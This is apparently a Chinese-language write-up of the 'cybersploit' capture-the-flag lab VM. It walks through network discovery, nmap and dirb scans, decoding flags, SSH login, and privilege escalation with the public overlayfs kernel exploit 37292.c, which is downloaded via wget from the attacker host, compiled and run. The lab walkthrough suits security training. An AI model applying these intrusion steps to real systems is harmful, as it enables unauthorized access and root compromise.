cybersploit


靶机准备

将ova文件导入虚拟机中,设置网络模式为NAT
从靶机描述得知包含3个flag


kali扫描其ip

netdiscover -r 192.168.164.0/24

渗透测试

namp扫描端口

nmap -sS -sV -T5 -A -p- 192.168.164.187


只开放了22、80端口
访问80端口

查看源码,发现信息

扫描一下目录

dirb http://192.168.164.187


发现robots.txt,访问

得到一串密文,尝试base64解码
成功获得flag1

接下来尝试ssh连接
利用刚才获得的username进行尝试猜测密码为flag1:
cybersploit{youtube.com/c/cybersploit}
成功登录

不是root权限

查看一下目录,发现flag2,读取

得到一串二进制数据,可能有用

01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101

使用工具将二进制转文本,获得flag2

提权

先查看系统内核版本

uname -a


是3.13.0-32-generic
查找是否有漏洞

searchsploit overlayfs


下载37292.c文件

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root


在kali开启http服务,靶机下载此文件。

python -m SimpleHTTPServer 8080
靶机:wget http://192.168.164.137:8080/37292.c


gcc编译命令:

gcc 37292.c -o test

执行脚本文件:

./test

提权成功,得到root权限!!!

进入root目录拿到最后一个flag3